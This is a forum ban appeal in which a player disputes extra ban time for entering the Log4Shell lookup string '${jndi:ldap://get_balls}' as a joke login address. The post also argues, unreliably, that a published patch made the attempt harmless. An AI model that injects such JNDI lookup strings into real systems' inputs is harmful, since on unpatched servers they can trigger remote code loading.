Hey guys, I'm making this forum post to address an issue with my ban. On the 9th of October 2022 I was banned from the network for joining with made-up login addresses back in April of this year, roughly a week later I found out that I was banned with a duration of 6 months and was told that there was 4 months for "attempting a log4j exploit" and 2 months for the made-up domains.
What was the attempted log4j "exploit" in question you may ask? Simple, when I was joining with made-up login addresses I joined with an address to reference and joke about log4shell, I used the following address "${jndi:ldap://get_balls}" (screenshot of the address before I connected https://cdn.discordapp.com/attachments/96…412/unknown.png) for the joke, now this is where the issue comes in with this part of my ban. I connected with this address on the 12/13th of April 2022 (Same dates I was joining with made-up addresses) and the log4shell CVE was discovered and reported to Apache on the 24th of November 2021 and patched on the 9th of December 2021 (5 months before I connected with made-up addresses) which means that by this date it was patched and is no longer a CVE or exploit, eitherway it would've caused no harm or disruption to the server as this had been patched well before and I'd also like to mention the "get_balls" section in this address which is in the place of an IP address which was the most common method used to link classes in the period this CVE was active for, I'm a Java programmer and I am well aware and familiar with how Log4J works and this would've caused no issues eitherway as it is not even leading to a valid location to a class that includes malicious code, not even a class which would have not done anything or any sort of stuff that would cause the server harm, this CVE was patched 5 months prior to me joining with this address and it was also very likely that the server updated to the patched versions of the libraries and running up-to-date Java versions which fix issues like these for security concerns, At the end of the day this was all meant to be an innocent joke but I think it has been interpreted wrong as me trying to cause harm or ill intent to the server rather than a silly joke address, I had no intentions or never will have intentions of trying to cause disruptions to the operation of the server and I probably should have notified staff about this and shouldn't have been joining with fake addresses anyway.
Anyways with all that being said i'd like for this issue to be looked into and hopefully to get the additional 4 month duration removed from the 6 months. I'm still willing to still serve the initial two months for connecting with the made-up login addresses when I shouldn't have and I have no issues with that other than the 4 additional months which the reasoning for doesn't satisfy me to be worthy of having such duration added on.
Anyways this is all I have to say and I will see you guys later,
Eva
